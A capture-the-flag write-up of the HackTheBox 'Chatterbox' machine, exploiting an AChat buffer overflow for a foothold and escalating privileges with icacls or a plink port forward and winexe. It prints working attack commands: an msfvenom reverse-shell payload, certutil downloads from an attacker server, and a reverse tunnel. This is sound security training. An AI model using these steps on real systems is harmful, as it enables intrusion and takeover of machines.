HTB - Chatterbox

Windows | Buffer Overflow | icacls | plink | winexe

Tools For This Room

  • plink.exe - CLI tool used to access repositories on a remote server - download it here

TL;DR / Executive Summary

  1. Scan with "-Pn" flag and break down ports by batches

  2. Modify script to gain foothold via buffer overflow

  3. PrivEsc by granting permissions with icacls OR port forwarding with plink and winexe

Scanning & Enumeration

We'll start with the usual nmap scan

nmap -sV -sC -vv <IP>

Unfortunately, we get the message that the host seems down. Let's take another approach using the "-Pn" flag. However, due to the time intensive nature of a Ping scan, we'll break down the 65535 ports into batches to speed things up.

nmap -Pn -sV -sC -vv -p 1-10000 <IP>

After grabbing some snacks, we see that our scan has yielded results:

Checking out these ports via browser does not yield any working pages. AChat isn't a commonly seen program, so let's check it out via Exploit-DB's command line search tool - Searchsploit:

Although we have the option of using Metasploit with the Ruby (.rb) file, let's have a look at the manual exploit - 36025.py. We'll copy it to our preferred directory and open it with our preferred editor.

searchsploit -m /usr/share/exploitdb/exploits/windows/remote/36025.py
gedit ./36025.py

Let's see how it works, and if we need to make any modifications to the script.

Looks like this exploit uses a buffer overflow to execute the desired command. Since this is a Proof-Of-Concept, it only launches the calculator with "calc.exe" to demonstrate what a remote attacker could do. The author has been kind enough to include the bad characters for us! These are the characters "\x00\x80\x81..." listed after the "-b" flag. These bad characters can break our shell code, and is important to identify them in a buffer overflow.

Our first step now is to create our own payload using msfvenom, utilising the handy commands included by the author.

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

This will result in our payload which will give us a reverse shell. We can now replace the payload in 36025.py with our newly created payload, by simply deleting the rows with "buf +=..." and pasting in our own payload.

Now let's change the IP listed to the victim machine's IP. As we can see, the port is already set as 9256 for us.

We also start a netcat listener on our preferred port to catch our reverse shell:

nc -lvnp <port>

Executing our modified python exploit, let's see if we caught our reverse shell.

python ./36025.py

This machine has a bit of a hit-or-miss element to it, so don't fret if a reverse shell is not generated the first time. Just try it a few more times, or restart the HTB box and try again.

Nice! we've secured a foothold and can go ahead to explore. We're user Alfred, and if we navigate to his desktop, we'll find the user flag:

cd C:\Users\Alfred\Desktop

Now let's see how we can escalate our privileges to the sweet "NT authority\system".

Privilege Escalation

Initially, I attempted a kernel exploit, but unfortunately it had been patched by the comprehensive list of security patches.

We will be exploring 2 ways of getting the root.txt flag. The first method will exploit Access Control Lists and file ownership to read the flag, but will not give us nt authority\system. The second method is from The Cyber Mentor's Windows PrivEsc course, and will involve port forwarding using plink, along with a username and password to elevate us. So do have a look at both methods to have a few more techniques up your sleeve.

Method 1

Let's check out the users on this machine.

We see there's only Alfred and Administrator. Usually, we're not allowed to enter the Administrator's directory. However, testing that out on this machine grants us access! Unfortunately, our luck doesn't extend to letting us view the root flag. But checking the file ownership with this command shows us an interesting detail:

dir /q

Although the root flag is on the Administrator's Desktop, it belongs to Alfred. A quirk of Windows is that if you're the owner of a file, you're able to grant permissions to users, regardless of other factors.

We'll use the command "icacls" to grant ourselves permissions to the root flag which we own. The "(F)" signifies "Full Access". More info on "icacls" here.

icacls root.txt /grant Alfred:(F)

We now have permission to view the flag:

Method 2

Let's call in our favorite privesc enumeration tool: winPEAS. But first let's confirm the system architecture with the "systeminfo" command. This results show this is an x86-based PC. As this is a 32 bit machine, we'll be using winPEAS86.exe.

We'll use the "certutil" command along with a server hosted on our attacking machine to get winPEAS86.exe onto our victim machine. "Certutil" functions similarly to "wget" on Linux. Let's start the server first:

python -m SimpleHTTPServer

Before we make the transfer, ensure that we're in a directory which allows us to write into. For instance, c:\Windows\system32 will not allow us to transfer the file.

So a quick move over to c:\Users\Alfred will let us grab our desired file:

certutil -urlcache -f http://<IP>:<port>/winPEAS86.exe <outputfile>

Let's run winPEAS and see what turns up.

A hot minute later, we can go through the results. It looks like we've snagged a username and password!

Unfortunately, neither port22 nor SSH turned up in our initial nmap scan. So that avenue is unavailable to us. Although there is plenty of info highlighted in red, we'll pay special attention to the ports which are open only to the internal network. Aside from ports 9255 and 9256, we see a host of ports such as 135 and 445 which are open internally.

Although our permissions are currently that of user Alfred's, let's make an assumption that Alfred is an administrator, and that upon entering his password, he'll elevate his privileges. * Full credit to The Cyber Mentor for this method *

Given Alfred's credentials and the ports which are open internally, let's use a technique called port-forwarding to expose port445 to the public network.

We'll start with downloading the latest version of plink.exe from here. Plink is a command line interface to PuTTY's backend. PuTTY in turn is an SSH and Telnet client.

Now we need to get plink onto our victim machine, with the following command:

certutil -urlcache -f http://<ourIP>:<port>/plink.exe <outputfile>

Before running it, we need to make some changes on the SSH daemon config file. Let's open up /etc/ssh/sshd_config with our preferred editor.

sudo gedit /etc/ssh/sshd_config

Once there, we need to un-comment and change the permission of PermitRootLogin:

Now we can return to our victim machine and run execute plink:

plink.exe -l <username> -pw <password> -R 445:127.0.0.1:445 <ourIP>

This will allow us to access the victim machine over port445. Now let's use winexe which will allow us to run Linux commands on a Windows machine.

winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"

Verifying with "whoami" shows us that we are now Administrator on this machine.

PreviousHTB - DevelNextHTB - Brainfuck

Last updated

Was this helpful?